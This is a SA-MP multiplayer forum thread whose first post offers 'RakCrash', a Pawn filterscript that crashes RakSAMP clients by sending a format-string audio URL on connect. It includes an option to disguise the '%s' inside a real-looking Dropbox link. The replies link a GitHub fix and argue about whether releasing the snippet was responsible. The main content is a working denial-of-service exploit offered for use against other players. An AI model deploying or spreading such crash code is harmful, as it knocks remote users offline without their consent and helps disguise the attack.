SA-MP Forums

Go Back   SA-MP Forums > SA-MP Scripting and Plugins > Filterscripts

Reply
 
Thread Tools Display Modes
Old 20/08/2018, 04:13 AM   #1
SlowARG
Big Clucker
 
SlowARG's Avatar
 
Join Date: Feb 2014
Posts: 52
Reputation: 18
Default RakCrash - Crash RakSAMP players! [SNIPPET]

RakCrash
Snippet for crashing RakSAMP players.

Description
There's a little bug in RakSAMP so it's possible to crash RakSAMP players by abusing null strings.

How?
RakSAMP crashes when passing string format specifier in Log() function.
Since SA-MP client doesn't crash passing null string inside audio stream, we can abuse this to crash invalid clients such as RakSAMP.

Downloads
PHP Code:
#include <a_samp>
#define FILTERSCRIPT
#define _RAKCRASH_HIDE // Hide "%s" in "real URL". 

/********************************************************************************
* How it works?                                                                    *
* RakSAMP crashes when passing string format specifier in Log() function.        *
* File: netrpc.cpp on ScrPlayAudioStream function:                                *
* Log("[AUDIO_STREAM] %s", szURL); --> if szURL contains %s, it will crash        *
* Since SA-MP client doesn't crash passing null string inside audio stream        *
* we can abuse this to crash invalid clients such as RakSAMP.                    *
*********************************************************************************/

public OnPlayerConnect(playerid)
{
#if defined _RAKCRASH_HIDE
    
PlayAudioStreamForPlayer(playerid"https://dl.dropboxusercontent.com/s/ac4oqi08gtiuzb0/intro%samp.mp3?dl=0"); // you can use any url containing %s or %20s or something else. It doesn't need to be a valid URL.
#else
    
PlayAudioStreamForPlayer(playerid"%s");
#endif
    
StopAudioStreamForPlayer(playerid);
    return 
1;

Greetings!
Nobody.

Last edited by SlowARG; 30/09/2019 at 02:14 AM.
SlowARG is offline   Reply With Quote
Old 20/08/2018, 05:35 PM   #2
brauf
Little Clucker
 
brauf's Avatar
 
Join Date: Jul 2018
Location: i live in narnia city Savage: 100%
Posts: 28
Reputation: 17
Default Re: RakCrash - Crash RakSAMP players! [SNIPPET]

https://github.com/P3ti/RakSAMP/pull/23

didn't live long.
__________________
[SNIPPET] serverHang

brauf is offline   Reply With Quote
Old 20/08/2018, 06:25 PM   #3
KinderClans
Banned
 
Join Date: May 2018
Location: Italy
Posts: 718
Reputation: 43
Default Re: RakCrash - Crash RakSAMP players! [SNIPPET]

Quote:
Originally Posted by brauf View Post
lmao

Died before borning.
KinderClans is offline   Reply With Quote
Old 21/08/2018, 06:13 PM   #4
SlowARG
Big Clucker
 
SlowARG's Avatar
 
Join Date: Feb 2014
Posts: 52
Reputation: 18
Default Re: RakCrash - Crash RakSAMP players! [SNIPPET]

It'll live for a long because RakSAMP hasn't been updated for a long time. Anyway lot of "users" don't know about new RakSAMP updates so it'll be functional like old RakCrash method.

Best regards.

Last edited by SlowARG; 22/08/2018 at 03:35 AM.
SlowARG is offline   Reply With Quote
Old 21/08/2018, 07:02 PM   #5
iAmir
Banned
 
Join Date: May 2017
Location: Iran
Posts: 112
Reputation: 191
Default Re: RakCrash - Crash RakSAMP players! [SNIPPET]

Awesome, you release a code that can crash RakSAMP clients, then you create a PR in RakSAMP's repo and tell'em about your own release RakCrash and attempt to fix it.
pathetic...
iAmir is offline   Reply With Quote
Old 21/08/2018, 08:15 PM   #6
SlowARG
Big Clucker
 
SlowARG's Avatar
 
Join Date: Feb 2014
Posts: 52
Reputation: 18
Default Re: RakCrash - Crash RakSAMP players! [SNIPPET]

Quote:
Originally Posted by iAmir View Post
Awesome, you release a code that can crash RakSAMP clients, then you create a PR in RakSAMP's repo and tell'em about your own release RakCrash and attempt to fix it.
pathetic...
Calm down dude...
I did a PR on GitHub before this post.
When someone finds a vulnerability in any software, such as Windows OS, first fix the vuln and then release a PoC code.
So I fixed the bug and then release the PoC.

I don't want rep or similar bullshit. I released this snippet to combat script kiddies that can't compile RakSAMP by themselves.

So if you will not comment any constructive message then don't fricking disturb.

Again, calm down.

Last edited by SlowARG; 21/08/2018 at 08:59 PM.
SlowARG is offline   Reply With Quote
Old 26/08/2018, 03:29 PM   #7
rorrobryan
Little Clucker
 
Join Date: Aug 2017
Posts: 14
Reputation: 0
Default Re: RakCrash - Crash RakSAMP players! [SNIPPET]

Thanks!
rorrobryan is offline   Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Anti-RakSamp Commands xUnknow Server Support 2 27/01/2017 02:31 PM
Is it RakSamp attack ? Manuel_Franco Server Support 13 21/09/2014 06:43 PM
Players crash Hudgens Server Support 6 04/01/2011 02:34 AM


All times are GMT. The time now is 10:18 PM.


Powered by vBulletin® Version 3.8.6
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd.